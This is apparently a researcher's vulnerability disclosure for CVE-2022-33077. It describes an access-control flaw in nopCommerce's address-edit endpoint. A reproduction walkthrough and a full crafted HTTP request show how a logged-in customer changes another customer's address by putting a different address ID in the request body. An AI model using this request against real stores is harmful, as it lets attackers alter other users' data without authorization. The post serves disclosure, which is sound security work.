Home Cve 2022–33077 Idor To Change Address Of Any Customer Via Parameter Pollution In Nopcommerce
Post
Cancel

Cve 2022–33077 Idor To Change Address Of Any Customer Via Parameter Pollution In Nopcommerce

Description

There is an access control vulnerability affecting nopCommerce (≤ 4.50.2) and also affecting the upcoming beta version (4.60). The vulnerability lies in the “addressedit” endpoint, and a malicious customer can modify addresses of other users on the site. This has been assigned CVE-2022–33077.

Proof of concept

  1. Register 2 customers (C1 and C2) and add addresses (A1 and A2) for both of them respectively. Note down the address Id of both the created addresses (let it be A1_ID and A2_ID). We will now login as C1 and modify A2.
  2. Login as C1 and capture the POST request to edit your address as shown below. I’ve highlighted 4 parameters that you need to replace.

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    
     POST /customer/addressedit/<A1_ID> HTTP/2
     Host: localhost
     Cookie: <C1_Session_Cookies_Here>
     User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:100.0) Gecko/20100101 Firefox/100.0
     Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
     Accept-Language: en-US,en;q=0.5
     Accept-Encoding: gzip, deflate
     Content-Type: application/x-www-form-urlencoded
     Content-Length: 506
     Origin: http://localhost
     Upgrade-Insecure-Requests: 1
     Sec-Fetch-Dest: iframe
     Sec-Fetch-Mode: navigate
     Sec-Fetch-Site: same-origin
     Sec-Fetch-User: ?1
     Te: trailers
     Address.Id=<A2_ID>&Address.FirstName=testing&Address.LastName=123&Address.Email=hello@hello.lcom&Address.Company=&Address.CountryId=211&Address.StateProvinceId=0&Address.City=sdv&Address.Address1=dsv&Address.Address2=&Address.ZipPostalCode=sdv&Address.PhoneNumber=12&Address.FaxNumber=&__RequestVerificationToken=<C1_CSRF_TOKEN_HERE>
    
  3. Upon firing the above request with C1’s session tokens, the address of C2 will be updated. First the server is checking whether the addressID in the URL belongs to the Session token provided in the cookies, and then it is simply updating the address ID inside the POST request body. Logically, it should only update what it validates.

Video POC

nopCommerce IDOR POC

This post is licensed under CC BY 4.0 by the author.